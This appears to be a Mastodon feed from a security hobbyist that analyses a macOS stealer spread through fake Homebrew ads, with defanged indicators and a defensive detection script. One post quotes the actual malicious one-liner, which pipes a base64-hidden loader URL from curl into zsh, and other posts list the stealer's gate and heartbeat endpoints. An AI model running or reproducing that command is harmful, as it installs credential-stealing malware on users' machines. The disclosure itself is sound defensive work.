143 Followers
206 Following
197 Posts

Developer at a cybersecurity startup.

Infosec hobbyist, hope that one day I'll actually be able to contribute.

Rarely complete projects (ask me about my honeypot, or pippin)

Twitter https://twitter.com/fauxeccles
GH https://github.com/faux-eccles
pronouns he/him

In case anyone was wondering, #mellowtel still seems to be processing requests. If it's still via the browser botnet I'm not sure, but I assume so.

Some queries I've noted,

- circumventing query restrictions for searching government business dbs
- loading Instagram pages
- using the perplexity API for determining product recommendations for various questions
- performing Google searches and extracting the AI result

https://arstechnica.com/security/2025/07/browser-extensions-turn-nearly-1-million-browsers-into-website-scraping-bots/

Seems like slab has been used a bit here and there for this campaign using various compromised ads accounts
https://adstransparency.google.com/?region=anywhere&platform=SEARCH&query=Homebrew+for+Mac&domain=slab.com

Huge amount of different ads accounts, all following similar approaches, oldest ad might be March 22nd

Interesting addendum about the advertiser https://adstransparency.google.com/advertiser/AR08935176312499208193?origin=ata&region=anywhere

I suspect it could be a compromised ads account, that being said I can't actually find this ad listed in the transparency page

A more sane and parseable list of indicators:

Landing page

httpX://macdev.slab[.]com/public/posts/insta-іі-with-termina-і-g40n4aau?shr=6etwxr0gksp2ltctcqv7gom7

Loaders

httpX://datasphere.us[.]com/debug/loader.sh?build=492f9e58358e8e2bc9e0414fa077e197
https://datasphere.us.com/debug/payload.applescript?build=492f9e58358e8e2bc9e0414fa077e197

Mocked User Agent for curls

Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.114 Safari/537.36

APIs

httpX://datasphere.us[.]com/api/debug/event # initial info gathering
httpX://datasphere.us[.]com/gate # stealer upload location
httpX://datasphere.us[.]com/gate/chunk # large file uploads
httpX://datasphere.us[.]com/api/bot/heartbeat # Persistence heartbeat API

api key 61cb9c3bd1a2faa7d6613dd8e5d09e79fe95e85ab09ed6bcd6406badff5a083f

#osx #stealer #iocs

Absolute state of google, (and frankly the expectations of developers for installing things).

Setting up an older Mac to use as a new work machine, search google for brew Mac looking for the brew.sh site, first result is a sponsored link to httpX://macdev.slab[.]com/public/posts/insta-іі-with-termina-і-g40n4aau?shr=6etwxr0gksp2ltctcqv7gom7. I know it's not right but I got curious, let's see what's inside.

First link is familiar install instructions as we're used to for brew "here copy paste this code into terminal, don't ask questions". * Don't actually do this *

echo "Downloading Update: https://support.apple.com/downloads/xprotect-remediator-150.dmg" && curl -s $(echo "aHR0cHM6Ly9kYXRhc3BoZXJlLnVzLmNvbS9kZWJ1Zy9sb2FkZXIuc2g/YnVpbGQ9NDkyZjllNTgzNThlOGUyYmM5ZTA0MTRmYTA3N2UxOTc=" | base64 -d) | zsh


Aww man that base64 makes me feel good and trusting, wonder what's inside

echo 'aHR0cHM6Ly9kYXRhc3BoZXJlLnVzLmNvbS9kZWJ1Zy9sb2FkZXIuc2g/YnVpbGQ9NDkyZjllNTgzNThlOGUyYmM5ZTA0MTRmYTA3N2UxOTc=' | base64 -d | cat

httpX://datasphere.us[.]com/debug/loader.sh?build=492f9e58358e8e2bc9e0414fa077e197


hrmm, that's not brew, oh well maybe this is fine, let's check it out with urlscan, looks like me and 5 of my closest friends have had the same idea
https://urlscan.io/result/019d298d-3b24-7571-a37a-12575ae1eb84/

Another base64 blob, that truly gives me the warm and fuzzies, I'm starting to think maybe it's not brew https://pastebin.com/5cr5Nh1W
VirusTotal thinks this new blob might be a stealer https://www.virustotal.com/gui/file/54043cd8874e0eabbced73e433cfa30c75fd45364ae4f03fbda2eabca9d8d994?nocache=1

This blob grabs some basic info then pulls an osa script which appears to be the friends we made along the way (stealer)
https://www.virustotal.com/gui/file/f02758a235a220f2fa125bb6f45a49e674fd8b91f320a382e8b7017d93afbc74

Pastebin doesn't like the script so won't upload it there, can reach out if a copy is needed, but seems to be pretty well indexed

#osx #malware #stealer #google #brew
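An added example, not from the original post: a small Python checker for the pattern above. It decodes any base64 blobs hidden in a pasted one-liner, reports the URLs they conceal in the same defanged form used for the indicators, and flags the command when the fetched content is piped straight into a shell. The sample one-liner and its placeholder URLs are constructed for the example.

```python
import base64
import re

# Base64 runs of 16+ characters; shorter runs are too often ordinary words.
B64_RE = re.compile(r"[A-Za-z0-9+/]{16,}={0,2}")
# Fetched content piped straight into an interpreter is what makes this dangerous.
PIPE_TO_SHELL_RE = re.compile(r"\|\s*(?:sudo\s+)?(?:ba|z|k)?sh\b")
URL_RE = re.compile(r"https?://[^\s'\"<>)]+")


def decode_blobs(command: str) -> list[str]:
    """Return the printable text of every base64 blob embedded in the command."""
    decoded = []
    for blob in B64_RE.findall(command):
        try:
            text = base64.b64decode(blob, validate=True).decode("utf-8")
        except (ValueError, UnicodeDecodeError):
            continue  # not real base64, or binary content: ignore
        if text.isprintable():
            decoded.append(text)
    return decoded


def defang(url: str) -> str:
    """Write a URL the way the indicators above are written (httpX://, [.])."""
    return re.sub(r"^https?", "httpX", url).replace(".", "[.]")


def analyse(command: str) -> dict:
    """Summarise why a pasted install one-liner should not be trusted."""
    hidden = [u for text in decode_blobs(command) for u in URL_RE.findall(text)]
    piped = bool(PIPE_TO_SHELL_RE.search(command))
    decodes = "base64 -d" in command or "base64 --decode" in command
    return {
        "visible_urls": URL_RE.findall(command),  # may be decoy text, e.g. a fake vendor link
        "hidden_urls": [defang(u) for u in hidden],
        "piped_to_shell": piped,
        "suspicious": piped and (decodes or bool(hidden)),
    }


# Constructed sample modelled on the pattern in the post; the hidden loader URL
# is a placeholder under the reserved .invalid TLD, not the real address.
HIDDEN_URL = "https://loader.example.invalid/debug/loader.sh?build=0123456789abcdef0123456789abcdef"
SAMPLE = (
    'echo "Downloading Update: https://updates.example.invalid/update.dmg" && '
    f'curl -s $(echo "{base64.b64encode(HIDDEN_URL.encode()).decode()}" | base64 -d) | zsh'
)

if __name__ == "__main__":
    for key, value in analyse(SAMPLE).items():
        print(f"{key}: {value}")
```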

@BleepingComputer
Peek under the hood, oh it's just OneDrive

@SecurityWriter
The combat always feels so good, though as a mostly glaive player there was less precision in my attacks, and mostly trying to pogo in the air for as long as possible.

Though with wilds I tried out longsword for the weebery and man some of the combos and setups just feel so good when you start learning the patterns

@crikeycon

Are these panels recorded? This is definitely a talk that I'd find interesting for work.

@Viss

I wonder how well these agentic crawlers manage phishing pages like this. Many have the ability to go "do their own research" on a particular topic, but if they're served with a page like this would they just follow the instructions in a best effort attempt and go it alone?

@sassdawe @da_667 @jpm @decryption

that's right! it goes in the DOWNLOADS folder